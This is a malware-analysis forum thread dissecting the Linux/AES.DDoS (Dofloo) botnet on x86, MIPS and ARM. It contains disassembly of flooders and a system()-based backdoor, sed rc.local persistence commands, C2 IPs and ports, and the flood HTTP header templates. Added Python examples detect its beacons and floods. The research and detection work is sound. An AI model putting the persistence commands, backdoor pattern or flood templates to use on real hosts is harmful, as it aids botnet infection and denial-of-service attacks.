Linux/AES.DDoS (alias Dofloo, MrBlack)


Postby unixfreaxjp » Fri Sep 12, 2014 12:37 am

The malware is not Elknot, IptabLesx or BillGates; it uses AES to decrypt the target & CNC data, and contains 13 flooders (they added these one by one.. so the next variant may have more). Originated from China, with SSH hacking as the spreading method. The malware was first spotted a few times in mid 2014. This sample is not the first sample / a new one.

This sample was served in the panel below (note: a just-released sample):
[image: panel screenshot]

Some notes:

Flood mitigation can be applied by filtering this specific header (ref: .rodata:0x080ED38F && .rodata:0x080ED474):
Code:
Accept-Language: zh-cn
Accept-Language: zh-CN

Autostart installation:
Code:
sed -i -e '/%s/d' /etc/rc.local                                 
sed -i -e '2 i%s/%s' /etc/rc.local                             
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local                   
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local 

Source files (unstripped)
Code:
File : 'crtstuff.c'
File : 'AES.cpp'
File : 'main.cpp'
File : 'eh_personality.cc'
File : 'eh_alloc.cc'
File : 'eh_exception.cc'
File : 'eh_call.cc'
File : 'pure.cc'
File : 'eh_globals.cc'
File : 'del_op.cc'
File : 'eh_catch.cc'
File : 'class_type_info.cc'
File : 'allocator-inst.cc'
File : 'string-inst.cc'
File : 'eh_terminate.cc'
File : 'eh_term_handler.cc'
File : 'si_class_type_info.cc'
File : 'eh_throw.cc'
File : 'eh_unex_handler.cc'
File : 'vterminate.cc'
File : 'tinfo.cc'
File : 'new_op.cc'
File : 'eh_type.cc'
File : 'cp-demangle.c'
File : 'functexcept.cc'
File : 'regex.cc'
File : 'system_error.cc'
File : 'functional.cc'
File : 'future.cc'
File : 'new_handler.cc'
File : 'bad_typeid.cc'
File : 'bad_alloc.cc'
File : 'eh_ptr.cc'
File : 'guard.cc'
File : 'guard_error.cc'
File : 'bad_cast.cc'
File : 'ios_failure.cc'
File : 'stdexcept.cc'
File : 'condition_variable.cc'
File : 'mutex.cc'
File : 'thread.cc'
File : 'unwind-dw2.c'
File : 'unwind-dw2-fde-dip.c'
File : 'libgcc2.c'
File : 'unwind-c.c'

Some PoC of AES:
Code:
.text:0804832C ; AES::AES(unsigned char *)
.text:0804832C  public _ZN3AESC2EPh
   ;;
.text:0804883E ; AES::KeyExpansion(unsigned char *, unsigned char (*)[4][4])
.text:0804883E   public _ZN3AES12KeyExpansionEPhPA4_A4_h
  ;;

DDoS functions (13 of them): SYN_Flood, LSYN_Flood, UDP_Flood, TCP_Flood, DNS_Flood1, DNS_Flood2, DNS_Flood3, DNS_Flood4, CC_Flood, CC2_Flood, CC3_Flood, UDPS_Flood, UDP_Flood
Code:
;; DDOS 1

0x0804EE62:
mov     eax, [ebp+arg_0]
mov     eax, [eax+18Ch]
cmp     eax, 28h
jg      short 0x0804EE9D
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9SYN_FloodPv ; SYN_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
jmp     short 0x0804EEC8

;; DDOS 2

0x0804EE9D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10LSYN_FloodPv ; LSYN_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create

;; DDOS 3

0x0804EEED:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 4

0x0804EF3D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9TCP_FloodPv ; TCP_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 5

0x0804EF8D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10DNS_Flood1Pv ; DNS_Flood1(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 6

0x0804EFDD:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10DNS_Flood2Pv ; DNS_Flood2(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 7

0x0804F02D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10DNS_Flood3Pv ; DNS_Flood3(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 8

0x0804F07D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10DNS_Flood4Pv ; DNS_Flood4(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 9

0x0804F0CD:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z8CC_FloodPv ; CC_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 10

0x0804F11D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9CC2_FloodPv ; CC2_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 11

0x0804F16D:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9CC3_FloodPv ; CC3_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 12

0x0804F1BD:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z10UDPS_FloodPv ; UDPS_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

;; DDOS 13

0x0804F20A:
mov     eax, [ebp+var_C]
shl     eax, 2
lea     edx, id[eax]
mov     eax, [ebp+arg_0]
mov     [esp+0Ch], eax
mov     dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
mov     dword ptr [esp+4], 0
mov     [esp], edx
call    pthread_create
add     [ebp+var_C], 1

System command interface for execution.. this is bad; a hacked server can be used as a RAT.
Code:
.text:0x0804E6C2 ; Cmdshell(_MSGHEAD *)
.text:0x0804E6C2 public _Z8CmdshellP8_MSGHEAD
.text:0x0804E6C2 _Z8CmdshellP8_MSGHEAD proc near
.text:0x0804E6C2
.text:0x0804E6C2 arg_0= dword ptr  8
.text:0x0804E6C2
.text:0x0804E6C2 push    ebp
.text:0x0804E6C3 mov     ebp, esp
.text:0x0804E6C5 sub     esp, 18h
.text:0x0804E6C8 mov     eax, [ebp+arg_0]
.text:0x0804E6CB add     eax, 100h
.text:0x0804E6D0 mov     [esp], eax
.text:0x0804E6D3 call    system
.text:0x0804E6D8 leave
.text:0x0804E6D9 retn
.text:0x0804E6D9 _Z8CmdshellP8_MSGHEAD endp
.text:0x0804E6D9

We can expect CPU info in the format below to be sent to the remote:
Code:
.text:0x080509E2 lea     eax, [ebp+var_1110]
.text:0x080509E8 add     eax, 68h
.text:0x080509EB mov     [esp+4], eax
.text:0x080509EF lea     eax, [ebp+var_1110]
.text:0x080509F5 add     eax, 64h
.text:0x080509F8 mov     [esp], eax
.text:0x080509FB call    _Z10GetCpuInfoPjS_ ; GetCpuInfo(uint *,uint *)
.text:0x08050A00 lea     eax, [ebp+var_11D0]
.text:0x08050A06 mov     [esp], eax
.text:0x08050A09 call    sysinfo
.text:0x08050A0E mov     [ebp+var_24], eax
.text:0x08050A11 mov     eax, [ebp+var_11C0]
.text:0x08050A17 shr     eax, 14h
.text:0x08050A1A mov     [ebp+var_10A4], eax
.text:0x08050A20 mov     edx, [ebp+var_11C0]
.text:0x08050A26 mov     eax, [ebp+var_11BC]
.text:0x08050A2C mov     ecx, edx
.text:0x08050A2E sub     ecx, eax
.text:0x08050A30 mov     eax, ecx
.text:0x08050A32 shr     eax, 14h
.text:0x08050A35 mov     [ebp+var_10A0], eax
.text:0x08050A3B lea     ebx, [ebp+var_43C]
.text:0x08050A41 mov     eax, 0
.text:0x08050A46 mov     edx, 100h
.text:0x08050A4B mov     edi, ebx
.text:0x08050A4D mov     ecx, edx
.text:0x08050A4F rep stosd
.text:0x08050A51 mov     ebx, [ebp+var_10A0]
.text:0x08050A57 mov     ecx, [ebp+var_10A4]
.text:0x08050A5D mov     edx, [ebp+var_10A8]
.text:0x08050A63 mov     eax, [ebp+var_10AC]
.text:0x08050A69 mov     dword ptr [esp+20h], offset aHacker ; "Hacker"
.text:0x08050A71 mov     [esp+1Ch], ebx
.text:0x08050A75 mov     [esp+18h], ecx
.text:0x08050A79 mov     [esp+14h], edx
.text:0x08050A7D mov     [esp+10h], eax
.text:0x08050A81 lea     eax, [ebp+var_1110]
.text:0x08050A87 mov     [esp+0Ch], eax
.text:0x08050A8B mov     dword ptr [esp+8], offset aVersonexLinuxS ; "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%"...
.text:0x08050A93 mov     dword ptr [esp+4], 400h
.text:0x08050A9B lea     eax, [ebp+var_43C]
.text:0x08050AA1 mov     [esp], eax
.text:0x08050AA4 call    snprintf
.text:0x08050AA9 mov     eax, ds:MainSocket
.text:0x08050AAE test    eax, eax

CNC:
Code:
sin_port=htons(48080), sin_addr=inet_addr("119.147.145.215")
Loc:
119.147.145.215||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89
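The check-in shown above, turned into detection logic as an added example (my code, not the author's). It parses the start of the "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|..." report the bot builds with snprintf, derives the two memory fields the same way the disassembly does from sysinfo(), and matches the destination against the CNC socket given in this post. The format string is truncated in the post, so everything after the second memory field is kept as an unparsed tail; the sample payload and its field values are constructed, and the meaning of the first %d (one of the two values GetCpuInfo writes) is not named in the post.

```python
"""Spot the Linux/AES.DDoS (Dofloo/MrBlack) check-in on the wire.

Added example, not code from the original post. The beacon prefix and the
CNC socket are the strings quoted in the post; extend KNOWN_CNC with later
sightings. The sample payload is constructed.
"""

BEACON_PREFIX = b"VERSONEX:Linux-"

# (ip, port) pairs the bot connects to; this post gives one.
KNOWN_CNC = {("119.147.145.215", 48080)}


def sysinfo_mem_mb(totalram, freeram):
    """The two %dMB fields as the x86 sample computes them from sysinfo():
    totalram >> 20 and (totalram - freeram) >> 20, i.e. total and used MiB.
    This is my reading of the two 'shr eax, 14h' sequences at 0x08050A11;
    sysinfo's mem_unit is ignored, exactly as the sample ignores it."""
    return totalram >> 20, (totalram - freeram) >> 20


def _strip_suffix(text, suffix):
    return text[:-len(suffix)] if text.endswith(suffix) else None


def parse_versonex_beacon(payload):
    """Return the decoded fields of a check-in, or None if it is not one.

    Field order follows the snprintf arguments in the disassembly:
      %s      kernel/OS string
      %d      first value written by GetCpuInfo (not named in the post)
      %d MHz  second value written by GetCpuInfo
      %dMB    total RAM
      %dMB    used RAM
      ...     truncated in the post, returned verbatim as 'tail'
    """
    if not payload.startswith(BEACON_PREFIX):
        return None
    parts = payload[len(BEACON_PREFIX):].decode("latin-1").split("|")
    if len(parts) < 5:
        return None
    mhz = _strip_suffix(parts[2], " MHz")
    total = _strip_suffix(parts[3], "MB")
    used = _strip_suffix(parts[4], "MB")
    if None in (mhz, total, used):
        return None
    try:
        return {
            "os": parts[0],
            "cpu_field": int(parts[1]),
            "cpu_mhz": int(mhz),
            "total_mb": int(total),
            "used_mb": int(used),
            "tail": "|".join(parts[5:]),
        }
    except ValueError:
        return None


def is_known_cnc(dst_ip, dst_port):
    """True when the destination is one of the listed CNC sockets."""
    return (dst_ip, dst_port) in KNOWN_CNC


def triage_flow(dst_ip, dst_port, first_payload):
    """Combine both signals into a verdict for one TCP flow's first segment."""
    beacon = parse_versonex_beacon(first_payload)
    cnc = is_known_cnc(dst_ip, dst_port)
    if beacon and cnc:
        return "aes.ddos check-in to listed CNC"
    if beacon:
        return "aes.ddos check-in to unlisted host (new CNC?)"
    if cnc:
        return "traffic to listed CNC, payload not a check-in"
    return "clean"


if __name__ == "__main__":
    # Constructed sample: kernel string and numbers are invented.
    sample = b"VERSONEX:Linux-2.6.32-431.el6.i686|2|2400 MHz|2048MB|512MB|Hacker"
    print(parse_versonex_beacon(sample))
    print(triage_flow("119.147.145.215", 48080, sample))
```

The payload check is deliberately independent of the address check: a new CNC with the same bot is still caught by the beacon prefix, and a known CNC receiving something else still stands out.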

Re: Linux/Elknot (DDoS botnet, alias DnsAmp) ARM version

Postby unixfreaxjp » Sat Sep 13, 2014 5:49 am

The ARM version, with so many specific modifications, I reversed and reported here: http://blog.malwaremustdie.org/2014/09/ ... lknot.html < we need wider awareness of this threat since it is aiming at router devices, and that is really not good news: routers are the biggest-volume device that is always online on the internet, every house that uses DSL to connect to the internet is using a router, and the ARM architecture maybe has more than a 40% share of this segment, so please do the math and imagine what happens if this segment is really targeted to be used as a DDoS bot army.

The samples I uploaded to VT are below, with a null detection ratio.
original: https://www.virustotal.com/en/file/7710 ... 410571540/
unpacked: https://www.virustotal.com/en/file/dacc ... 410525799/
For the AV & filtration industry, you should consider raising this detection.

Re: Linux/AES.DDoS (MIPS arc Version)

Postby unixfreaxjp » Sun Sep 14, 2014 10:31 am

The MIPS version of this variant was found. Compile date: Aug 2014.
https://www.virustotal.com/en/file/276b ... 410687960/
Code:
linux-mips: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1, statically linked, for GNU/Linux 2.6.16, with unknown capability 0xf41 = 0x756e6700, with unknown capability 0x70100 = 0x1040000, not stripped

Malware was uploaded for infection; total downloads detected so far: 1,394 times. PoC:
[image]

Installation:
Code:
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '/\n$/d' /etc/rc.local
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local

(Cross-)compiled by CodeSourcery
Code:
0x00C0FD4   GCC: (Sourcery CodeBench 2014.05-6) 4.8.3 20140320 (prerelease)
0x00CD3F2   ../ports/sysdeps/mips/mips32/crti.S
0x00CD416   /opt/codesourcery/mips-linux-gnu/src/glibc/csu
0x00CD445   GNU AS 2.24.51
0x00D8EA8   /opt/codesourcery/mips-linux-gnu/src/gcc/libgcc/config/mips
0x00D8EE4   /opt/codesourcery/mips-linux-gnu/src/generated/gcc/gcc/include
0x00D8F5A   /opt/codesourcery/mips-linux-gnu/libc/usr/include
0x00D8FC2   /opt/codesourcery/mips-linux-gnu/src/gcc/libgcc/../include

DDoS Attacks (4 types)
Code:
TCP_Flood(void *) 0x403EA4 // HTTP
CC_Flood(void *)  0x404914
CC2_Flood(void *) 0x405194
CC3_Flood(void *) 0x405A24

Backdoor
Code:
.text:0x40761C _Z8CmdshellP8_MSGHEAD:
.text:0x40761C
.text:0x40761C var_8= -8
.text:0x40761C var_4= -4
.text:0x40761C arg_0=  0
.text:0x40761C
.text:0x40761C addiu   $sp, -0x20
.text:0x407620 sw      $ra, 0x20+var_4($sp)
.text:0x407624 sw      $fp, 0x20+var_8($sp)
.text:0x407628 move    $fp, $sp
.text:0x40762C sw      $a0, 0x20+arg_0($fp)
.text:0x407630 lw      $v0, 0x20+arg_0($fp)
.text:0x407634 addiu   $v0, 0x100
.text:0x407638 move    $a0, $v0
.text:0x40763C jal     system
.text:0x407640 nop
.text:0x407644 move    $sp, $fp
.text:0x407648 lw      $ra, 0x20+var_4($sp)
.text:0x40764C lw      $fp, 0x20+var_8($sp)
.text:0x407650 addiu   $sp, 0x20
.text:0x407654 jr      $ra
.text:0x407658 nop

AES Crypt used PoC:
Code:
0x010B444   AES.cpp
0x00A0838   3AES
0x0111173   _ZN3AESC2EPh
0x0111A70   _ZN3AES9InvCipherEPvi
0x0111BD8   _ZN3AESD2Ev
0x0111FDC   _ZN3AESC1EPh
0x0112002   _ZTI3AES
0x011254D   _ZN3AES11InvSubBytesEPA4_h
0x0113CB2   _ZN3AES5FFmulEhh
0x01143C5   _ZN3AES13InvMixColumnsEPA4_h
0x01154CB   _ZN3AES8SubBytesEPA4_h
0x01159E1   _ZN3AESD1Ev
0x0115B55   _ZN3AES10MixColumnsEPA4_h
0x0116013   _ZN3AES9ShiftRowsEPA4_h
0x0116332   _ZN3AES12InvShiftRowsEPA4_h
0x011646A   _ZN3AESD0Ev
0x01164F3   _ZTV3AES
0x0116895   _ZN3AES9InvCipherEPh
0x01168AA   _ZN3AES11AddRoundKeyEPA4_hS1_
0x0116A69   _ZN3AES6CipherEPvi
0x011776C   _ZN3AES12KeyExpansionEPhPA4_A4_h
0x011880D   _ZTS3AES
0x0118F04   _ZN3AES6CipherEPh

2 patterns used for the HTTP flood (CC, CC2 and CC3 attacks), with User-Agent; note the Accept-Language header:
Code:
0x00A08B4   Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
0x00A0964   Accept-Language: zh-cn
0x00A0980   Accept-Encoding: gzip, deflate
0x00A09A2   User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
0x00A09FA   Host:
0x00A0A02   Connection: Keep-Alive
(...)
0x00A0A24   Accept: text/html, application/xhtml+xml, */*
0x00A0A54   Accept-Language: zh-CN
0x00A0A70   User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
0x00A0AC8   Accept-Encoding: gzip, deflate
0x00A0AEC   Host:
0x00A0AF6   Connection: Keep-Alive
0x00A0B10   Pragma: no-cache

DDoS PoC (took one function only..)
Code:
0x404914  # CC_Flood(void *)
0x404914 .globl _Z8CC_FloodPv
0x404914 _Z8CC_FloodPv:
(...)
0x404C90 addiu   $a1, $v1, (aGet - 0x4A0000)  # "GET "
0x404C94 move    $a2, $v0
0x404C98 jal     _ZStplIcSt11char_traitsIcESaIcEESbIT_T0_T1_EPKS3_RKS6_
0x404C9C nop
0x404CA0 addiu   $v1, $fp, 0x250+var_220
0x404CA4 addiu   $v0, $fp, 0x250+var_224
0x404CA8 move    $a0, $v1
0x404CAC move    $a1, $v0
0x404CB0 lui     $v0, 0x4A
0x404CB4 addiu   $a2, $v0, (aHttp1_1 - 0x4A0000)  # " HTTP/1.1\r\n"
0x404CB8 jal     _ZStplIcSt11char_traitsIcESaIcEESbIT_T0_T1_ERKS6_PKS3_
0x404CBC nop
... etc etc..blah..
*) I may add more details later..
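The Accept-Language filter suggested in the first post and the two complete header sets quoted in this post, written up as detection logic (an added example, my code, not the author's). A request is parsed, Host is dropped because it carries the target, and the remaining headers are compared exactly against each quoted set; the Accept-Language-only check from the first post is kept separately as the weaker signal. The three sample requests are constructed, including the one a real Chinese-locale browser would send, which a substring match on "zh-CN" would wrongly block; which of CC/CC2/CC3_Flood emits which set is not stated in the post, so the sets are simply numbered.

```python
"""Fingerprint the HTTP flood requests of Linux/AES.DDoS (CC/CC2/CC3_Flood).

Added example, not code from the original posts. The header values are the
.rodata strings quoted in the MIPS post (Host omitted: it is the target).
The sample requests are constructed.
"""

_IE10_UA = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"

# Header names lower-cased, values verbatim: the fingerprint is the exact spelling.
HEADER_SETS = {
    "set1": {
        "accept": ("image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, "
                   "application/x-shockwave-flash, application/vnd.ms-excel, "
                   "application/vnd.ms-powerpoint, application/msword, */*"),
        "accept-language": "zh-cn",
        "accept-encoding": "gzip, deflate",
        "user-agent": _IE10_UA,
        "connection": "Keep-Alive",
    },
    "set2": {
        "accept": "text/html, application/xhtml+xml, */*",
        "accept-language": "zh-CN",
        "user-agent": _IE10_UA,
        "accept-encoding": "gzip, deflate",
        "connection": "Keep-Alive",
        "pragma": "no-cache",
    },
}

# The two exact values the first post suggests filtering on.
FLOOD_ACCEPT_LANGUAGE = {"zh-cn", "zh-CN"}


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request_line, {name_lower: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def accept_language_matches(raw):
    """Weak signal: Accept-Language is exactly 'zh-cn' or 'zh-CN'.
    Exact comparison matters: browsers send lists such as 'zh-CN,zh;q=0.9'."""
    _, headers = parse_request(raw)
    return headers.get("accept-language") in FLOOD_ACCEPT_LANGUAGE


def classify(raw):
    """Strong signal: all headers except Host equal one of the quoted sets.
    Returns 'set1', 'set2' or None."""
    _, headers = parse_request(raw)
    headers.pop("host", None)
    for name, fingerprint in HEADER_SETS.items():
        if headers == fingerprint:
            return name
    return None


# Constructed samples. The request line mirrors "GET " + path + " HTTP/1.1\r\n"
# as CC_Flood concatenates it; the target host name is invented.
FLOOD_1 = (b"GET /index.php HTTP/1.1\r\n"
           b"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"
           b"Accept-Language: zh-cn\r\n"
           b"Accept-Encoding: gzip, deflate\r\n"
           b"User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\n"
           b"Host: victim.example\r\n"
           b"Connection: Keep-Alive\r\n\r\n")
FLOOD_2 = (b"GET / HTTP/1.1\r\n"
           b"Accept: text/html, application/xhtml+xml, */*\r\n"
           b"Accept-Language: zh-CN\r\n"
           b"User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\n"
           b"Accept-Encoding: gzip, deflate\r\n"
           b"Host: victim.example\r\n"
           b"Connection: Keep-Alive\r\n"
           b"Pragma: no-cache\r\n\r\n")
# A legitimate Chinese-locale browser: same UA, but a real language list.
LEGIT = (b"GET / HTTP/1.1\r\n"
         b"Host: victim.example\r\n"
         b"User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\n"
         b"Accept: text/html, application/xhtml+xml, */*\r\n"
         b"Accept-Language: zh-CN,zh;q=0.9\r\n"
         b"Accept-Encoding: gzip, deflate\r\n"
         b"Connection: Keep-Alive\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("flood1", FLOOD_1), ("flood2", FLOOD_2), ("legit", LEGIT)):
        print(label, classify(req), accept_language_matches(req))
```

Filtering on Accept-Language alone, as the first post proposes, is cheap to deploy at a reverse proxy, but it should be an exact match on the whole value; a bare "zh-cn"/"zh-CN" without a quality list is already unusual for browsers, and the full-set match removes the remaining false positives.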

Re: Linux/AES.DDoS

Postby unixfreaxjp » Sun Sep 21, 2014 10:56 am

Found this ELF MIPS architecture sample in a hacked MIPS router https://www.virustotal.com/en/file/be7e ... 411296377/
Some analysis PoC :
Code:
// AES

AES::AES(uchar *)                     0x0402470
AES::~AES()                           0x0402554
AES::~AES()                           0x04025A8
AES::Cipher(uchar *)                  0x04025EC
AES::InvCipher(uchar *)               0x04027F8
AES::Cipher(void *,int)               0x04029FC
AES::InvCipher(void *,int)            0x0402AC4
AES::KeyExpansion(uchar *,uchar (*)[4][4])      0x0402B4C
AES::FFmul(uchar,uchar)               0x0402E8C
AES::SubBytes(uchar (*)[4])           0x0402FCC
AES::ShiftRows(uchar (*)[4])          0x0403088
AES::MixColumns(uchar (*)[4])         0x04031A0
AES::AddRoundKey(uchar (*)[4],uchar (*)[4])     0x0403394
AES::InvSubBytes(uchar (*)[4])        0x040346C
AES::InvShiftRows(uchar (*)[4])       0x0403528
AES::InvMixColumns(uchar (*)[4])      0x0403644

// Attacks

TCP_Flood(void *)                     0x0403EA4 P
CC_Flood(void *)                      0x0404914 P
CC2_Flood(void *)                     0x0405194 P
CC3_Flood(void *)                     0x0405A24 P

// Backdoor:

backdoorA(void *)                     0x040A694 P
backdoorM(void *)                     0x040A73C P

0x040A758 jal     _Z15_ConnectServerMv
0x040A75C nop
0x040A760 lw      $v0, pid
0x040A768 beqz    $v0, loc_40A7B0
0x040A76C nop


// Autostart:

0x040B058 addiu   $v0, $fp, 0x188+var_70
0x040B05C move    $a0, $v0
0x040B060 lui     $v0, 0x4A
0x040B064 addiu   $a1, $v0, (aSedIESDEtcRc_l - 0x4A0000)  # "sed -i -e '/%s/d' /etc/rc.local"
0x040B068 lw      $a2, 0x188+arg_0($fp)
0x040B06C jal     sprintf
0x040B070 nop
0x040B074 addiu   $v0, $fp, 0x188+var_70
0x040B078 move    $a0, $v0
0x040B07C jal     system
0x040B080 nop
0x040B084 addiu   $v0, $fp, 0x188+var_70
0x040B088 move    $a0, $v0
0x040B08C lui     $v0, 0x4A
0x040B090 addiu   $a1, $v0, (aSedIE2ISSEtcRc - 0x4A0000)  # "sed -i -e '2 i%s/%s' /etc/rc.local"
0x040B094 addiu   $v0, $fp, 0x188+var_170
0x040B098 move    $a2, $v0
0x040B09C lw      $a3, 0x188+arg_0($fp)
0x040B0A0 jal     sprintf
0x040B0A4 nop
0x040B0A8 addiu   $v0, $fp, 0x188+var_70
0x040B0AC move    $a0, $v0
0x040B0B0 jal     system
0x040B0B4 nop
0x040B0B8 addiu   $v0, $fp, 0x188+var_70
0x040B0BC move    $a0, $v0
0x040B0C0 lui     $v0, 0x4A
0x040B0C4 addiu   $a1, $v0, (aSedIE2ISSStart - 0x4A0000)  # "sed -i -e '2 i%s/%s start' /etc/rc.d/rc"...
0x040B0C8 addiu   $v0, $fp, 0x188+var_170
0x040B0CC move    $a2, $v0
0x040B0D0 lw      $a3, 0x188+arg_0($fp)
0x040B0D4 jal     sprintf

Re: Linux/AES.DDoS

Postby unixfreaxjp » Sun Sep 21, 2014 11:15 am

Intel x32 of the AES.DDoS: https://www.virustotal.com/en/file/6ca3 ... 411297424/
CNC: 183.60.149.208:48080
Attacks:
Code:
DNS_Flood1(void *)
DNS_Flood2(void *)
DNS_Flood3(void *)
DNS_Flood4(void *)
SYN_Flood(void *)
LSYN_Flood(void *)
UDP_Flood(void *)
UDPS_Flood(void *)
TCP_Flood(void *)
CC_Flood(void *)
CC2_Flood(void *)
CC3_Flood(void *)

Re: Linux/AES.DDoS

Postby unixfreaxjp » Sun Sep 21, 2014 12:39 pm

This one is the ARM version https://www.virustotal.com/en/file/af76 ... /analysis/
Just like the MIPS version and unlike the Intel version, the attacks are limited to:
Code:
TCP_Flood(void *)
CC_Flood(void *)
CC2_Flood(void *)
CC3_Flood(void *)
Some installation scripts used:
Code:
sed -i -e '/exit/d' /etc/rc.local     
sed -i -e '/^\r\n|\r|\n$/d' /etc/rc.local   
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local   
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local     
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local

Re: Linux/AES.DDoS

Postby unixfreaxjp » Sun Sep 21, 2014 12:43 pm

For mitigation purposes, below are the pics describing the ways to filter the Linux/AES.DDoS CNC initial connection:
https://lh6.googleusercontent.com/-BSh3 ... 76/008.png
https://lh6.googleusercontent.com/-AJ87 ... 20/009.png

Re: Linux/AES.DDoS

Postby unixfreaxjp » Tue Sep 23, 2014 8:20 pm

New ELF binary 32, plain: https://www.virustotal.com/en/file/dbb8 ... 411503086/ ZERO detection.
CNC & drops (characteristic) PoC:
Code:
offset aEtc_mysys ; "/etc/.mysys"
offset a183_60_205_183 ; "183.60.205.183"

Still trying to convince itself it is a Windows service :lol:
Code:
.data:0810610C      0x00E C WinHelp32.exe
.data:0810612C      0x00A C WinHelp32   
.data:08106190      0x012 C WinHelp32 Service   
.data:081061F4      0x028 C WinHelp32 Remote Control Tool's Service   

It's the x32 version of the ARM (router) version I posted here: http://blog.malwaremustdie.org/2014/09/ ... lknot.html
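The sed-based autostart quoted for every variant in this thread (the x86 list in the first post, the longer MIPS and ARM lists with the extra '/exit/d' step) and the "/etc/.mysys" drop path above, as an added example that is not the author's code: simulate_install() applies the same edits to an in-memory copy of a boot script, and audit_boot_script() looks for what they leave behind. The clean rc.local content and the install directory are constructed; that the x86 variant lacks the '/exit/d' step is taken from the shorter list in the first post.

```python
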